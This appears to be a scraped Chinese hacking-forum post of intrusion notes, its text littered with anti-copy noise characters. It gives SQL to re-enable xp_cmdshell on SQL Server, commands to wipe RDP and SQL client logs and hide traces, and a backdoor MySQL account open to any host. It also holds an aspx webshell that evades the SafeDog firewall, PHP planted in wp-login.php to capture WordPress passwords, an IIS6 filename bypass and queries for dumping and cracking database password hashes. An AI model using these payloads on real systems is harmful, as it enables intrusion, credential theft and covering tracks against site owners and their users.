- b0 o: l# Y& S8 D7 Q----------------------------- ! I, S. A) }6 D" h; f2 ~) E S1 ~" o8 }" q9 F9 a9 K1 @4 p
删除扩展存储过过程xp_cmdshell的语句:) A- ?0 W0 X8 P! ?
exec sp_dropextendedproc 'xp_cmdshell' , [. W" F( R3 ?" W/ ^8 z 2 k/ b/ P0 F& m- E* `- X: T# F恢复cmdshell的sql语句 / i, I+ @, `9 T$ h4 F5 l$ B2 |exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'" n; P8 y$ q2 `) u p! n4 V" V. a- t
4 K3 R$ z4 @: e8 O6 N8 k/ p, W5 G& ? E0 T1 D, }+ J1 F9 J1 b
开启cmdshell的sql语句 4 F) Y% p3 l. A5 u% `' I! s0 f* G2 I% U7 k2 ^+ F
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'0 h/ Q7 p" j% F9 g) ?1 n' @
( Z; _- S" ~2 L* I( X" S2 h9 a
判断存储扩展是否存在 4 ^7 F" l: c& k/ Uselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'! C1 | s* h. V F' m
返回结果为1就ok 2 z: t6 H8 Q8 | x3 b$ L# i9 P4 }; D5 W& t% P b
恢复xp_cmdshell . h$ L+ W l9 g } Z. Jexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell', M$ Z: d' y! u! w. }
返回结果为1就ok $ g# s5 s# x, p5 D E5 [% e. f& ?1 U
否则上传xplog7.0.dll D& E. N5 O, }+ }. kexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll' 3 ~9 k: D$ B) w( h/ i( Y( `8 s3 w- |8 K
堵上cmdshell的sql语句 / j' X0 y, T# b' ^sp_dropextendedproc "xp_cmdshel( I& I, m+ S( b4 w9 D* g ]
------------------------- 3 L& l2 U6 n/ s) ?' h清除3389的登录记录用一条系统自带的命令:2 F) S: |. N5 Z9 D7 q% N
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f # X* L: _/ E+ I* R: `# v( J/ T- M) r3 a
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件 * F8 d$ `3 [' T2 Q" u; S, G5 j在 mysql里查看当前用户的权限9 t j; X5 A: g' b& ~( b3 N
show grants for 8 R+ {* M- L" j2 a
; j$ z# r. ~3 R! A: e以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。6 {9 M1 r9 A1 |/ w& V
+ J! }& I) m0 e2 c6 t: L1 K
4 _3 b3 G3 m, h2 N" ~
Create USER 'itpro'@'%' IDENTIFIED BY '123'; 0 X" V$ S! q+ O1 j4 d) u" Y. `6 |# T7 O/ E2 A1 g, g$ k
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION3 a2 Z* R/ s1 F. M$ n7 l
/ B6 V5 i" j+ S突破安全狗的一句话aspx后门5 C% U( X# |0 ^6 e1 {; s9 L
<%@ Page Language="C#" ValidateRequest="false" %> 9 F: v( ~. X: W) Y! a5 u<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> ' M9 d# ~ O0 e$ d5 n; d$ V5 `webshell下记录WordPress登陆密码 ! l/ O N! C& x7 V7 c$ ?* Owebshell下记录Wordpress登陆密码方便进一步社工 " e% V6 @2 m7 I( [在文件wp-login.php中539行处添加:) k6 v- Q' J ]6 U/ |$ p9 P. A8 w
// log password" c' I* z7 W5 h
$log_user=$_POST['log'];2 ]' u1 q3 Z. E$ W+ x- H5 |
$log_pwd=$_POST['pwd']; v9 \& s2 [5 p G& M
$log_ip=$_SERVER["REMOTE_ADDR"];% J$ a; \! H7 f$ D9 T B3 W7 ^
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip; , R# a8 ^3 \& i, Y( ~# s' R: M: Y- a6 Y$txt=$txt.”\r\n”; . d* i' E- P7 x( _. Rif($log_user&&$log_pwd&&$log_ip){ & ^! ?$ R x5 F6 |7 n1 c3 s@fwrite(fopen(‘pwd.txt’,”a+”),$txt);# Y$ ~' P3 D0 |1 {8 N/ V7 T
}' W) C. E( G# V$ {1 n
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。: Z& s | H; Y4 i
就是搜索case ‘login’* ]) j1 p7 O5 h
在它下面直接插入即可,记录的密码生成在pwd.txt中, " S" }9 ]. }# Y0 w" ^& V6 G其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录 1 ^) c' ^. r( I1 G: |利用II6文件解析漏洞绕过安全狗代码:5 ^0 A! r0 S( v, ^ K
;antian365.asp;antian365.jpg # e1 c% }* p: P2 T* a / r7 }3 m; P9 F! o各种类型数据库抓HASH破解最高权限密码!& S4 c( k3 d7 B" n$ x" z$ c
1.sql server2000& X3 S9 C& I* A5 B7 w; h
SELECT password from master.dbo.sysxlogins where name='sa'' s# L, h# Z2 y& I. x" n
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341, n# A2 r8 A" T7 T) M
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - g _4 Y. R) ] ! q5 Y, o4 ^3 r6 E5 @' V3 {6 a0×0100- constant header , a1 t# R9 B. q, h7 f34767D5C- salt1 S/ P1 q" {$ w- x# ^+ }
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash % _- ~; j) ?6 l' F$ C2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash) E' p6 K: n* E) T! T
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash 9 W' I% J3 T8 Z, g( C. OSQL server 2005:- ( |6 n) n- P: P, k4 NSELECT password_hash FROM sys.sql_logins where name='sa'/ [; o! }+ B* t; {5 s7 B# c
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F 4 U! t' V; B5 X4 \: d4 c0×0100- constant header/ Q. n P# c* N0 c$ d; Z, Z
993BF231-salt # Y: ~* J: o7 {* w5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash 0 v1 ?( h: d$ Ycrack case sensitive hash in cain, try brute force and dictionary based attacks. 5 M8 e; }* W" [! l, V9 [1 E( k- F+ |
update:- following bernardo’s comments:- : o& K+ ~& [1 @0 C( ]use function fn_varbintohexstr() to cast password in a hex string. % U+ Q7 Z+ D% {2 Y9 F) D Ye.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins & U4 x8 @- Z! N' M5 t . K$ J3 P6 v3 A6 [# ?' W3 hMYSQL:-+ y, W# r, G' p0 T3 k, T
2 R2 ~- I R$ V! v& J& @! Q0 eIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.. v+ [' Z7 z$ K$ u2 e7 ]" p
; p- u. s' u( L* Q*mysql < 4.1 " u# f8 ^4 J3 _3 p$ f; N; y 2 Y6 U( y0 m) }5 ~+ `( nmysql> SELECT PASSWORD(‘mypass’); F- i! Y. s- h
+——————–+ 6 k) i* f; ?5 f3 Q| PASSWORD(‘mypass’) | " a) `- ]( U& N. z5 ~+——————–+ " I# n+ c( A0 f5 G| 6f8c114b58f2ce9e |. u1 R: e D) ?% z" Q# |8 L
+——————–+5 k$ V ]6 N: H5 Q3 u j) ^6 S
7 L( w" J6 O- j*mysql >=4.1- b J$ Y9 r, G- p& D
( U5 i4 @6 W( U$ u, Kmysql> SELECT PASSWORD(‘mypass’); ; ^0 R9 t5 R' y a6 l2 s+——————————————-+ & ~+ K& c9 ]* i4 {2 s. G5 a| PASSWORD(‘mypass’) |* l9 Q7 J* N! r$ h5 \+ C4 ]/ Y
+——————————————-+ 0 q9 O* e1 c4 e, ? H| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | + e) C6 `- S/ `3 e9 r, U+——————————————-+/ u( v! U1 }% L; f9 T/ s
3 }; _3 m' B& N+ D& v. h1 m
Select user, password from mysql.user 3 e5 U7 G4 Y# @2 C% W, Z4 ~The hashes can be cracked in ‘cain and abel’; _7 i! y9 D$ _% w7 u7 O
7 v; g% ? T% i0 ~, MPostgres:- ! K. D6 N3 O$ m2 J4 n% J* L+ rPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”) ) Y3 Y6 }* y- H; w* vselect usename, passwd from pg_shadow; 3 y( {: d$ e( @5 v" ^2 Cusename | passwd / y( g) V7 z7 y4 H——————+————————————- 5 L1 B5 W& k5 ]. Ztestuser | md5fabb6d7172aadfda4753bf0507ed4396! K- L) {/ x( P2 _! V& ]: u# i
use mdcrack to crack these hashes:-" u( B" @0 {+ L8 `* m/ `
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396 * H" ?3 {- i% _& ^3 J4 w * m9 l3 Z, \$ A# K/ P7 h: `6 z4 hOracle:- ( E* J! q4 z! z8 d2 r! g7 C" Qselect name, password, spare4 from sys.user$ , K1 B$ X/ g7 j# F4 {8 r4 m- U! |hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g' M$ x; t2 O) I- u* I
More on Oracle later, i am a bit bored…. % p2 {& a7 u( j. B \- D! S, V/ R- {( i% G1 A
! C. n2 O7 P; h( g0 m+ v" I+ p- b) M
在sql server2005/2008中开启xp_cmdshell ( W: y1 o5 Y+ J9 |* l-- To allow advanced options to be changed. ( u' @! W/ k# W4 h+ u) j5 Y( yEXEC sp_configure 'show advanced options', 1% E% @) R2 H) u" V. I
GO 7 u0 B) b$ |5 |( E-- To update the currently configured value for advanced options. 7 ~# q6 n" v: a- m, L# x, T# gRECONFIGURE8 O# W# {; k% @; J
GO% w3 |7 V7 {7 o& M. `
-- To enable the feature. * A8 u2 u+ H* u. `" REXEC sp_configure 'xp_cmdshell', 1! e' Z! [, x! D! W4 a m
GO8 P" b- w( o2 |* D; |$ _! o
-- To update the currently configured value for this feature.& Y: h/ E% s: I3 ~ }$ I! q" G
RECONFIGURE* e7 K1 l' v' h" F- P
GO" B5 i, e% @# I5 O0 d+ U: I
SQL 2008 server日志清除,在清楚前一定要备份。' c8 f: i4 e% V# q
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:, o _) s; g4 M, X( B$ u1 F' O
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin 2 |$ p: ~0 j8 E2 `. }) K! [3 H! K0 x5 k7 K# R* s# [
对于SQL Server 2008以前的版本: 2 t% } X" m& D+ L# W1 gSQL Server 2005: 9 g2 O6 s! y9 ^. h! y删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat* B3 a8 k' ?+ b8 ~6 x3 w+ N% @/ @
SQL Server 2000:, S- C! ~; V& h0 s/ d
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。: W$ C4 B0 j2 l1 o8 n8 E4 x; I
. T- S8 O0 [$ L6 d3 f5 _本帖最后由 simeon 于 2013-1-3 09:51 编辑 0 Z) l- Z1 T; ~6 C' w, @ A! B) i8 b$ B2 _, B
6 q+ A' I; w- s5 l1 p) zwindows 2008 文件权限修改 0 `6 b9 y7 V& _* k6 U$ R1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx - T( }! f5 t/ |& J2 B8 Z0 p2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98 / \/ g- C# `7 x$ A. ]一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,, C' W' ^- S! j m
+ {' t& k( b8 ^9 L: V. b
Windows Registry Editor Version 5.00 ( {: @5 ?5 p$ y( L[HKEY_CLASSES_ROOT\*\shell\runas]2 e6 n3 V9 ?4 ]$ ]& o/ s; f' C
@="管理员取得所有权"1 G% z& z. _7 {6 \) n- `
"NoWorkingDirectory"=""" {6 _6 z) w2 {- I. }0 j
[HKEY_CLASSES_ROOT\*\shell\runas\command] 3 Z, Z# r1 s3 q q@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F". `5 F' M: h. R. C
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" y- z8 s( k' v0 p, b$ {( I
[HKEY_CLASSES_ROOT\exefile\shell\runas2]4 ]2 k" A9 h* V! N+ v) m
@="管理员取得所有权" + w% D/ [9 k* _, a$ w) C1 y) l"NoWorkingDirectory"=""* t; {" w& B4 x( ~
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command] * q8 D K$ W5 ^@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F": o4 z4 t/ T: A# w! | o6 ?
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"! \7 X2 s: y5 ?) e% _2 R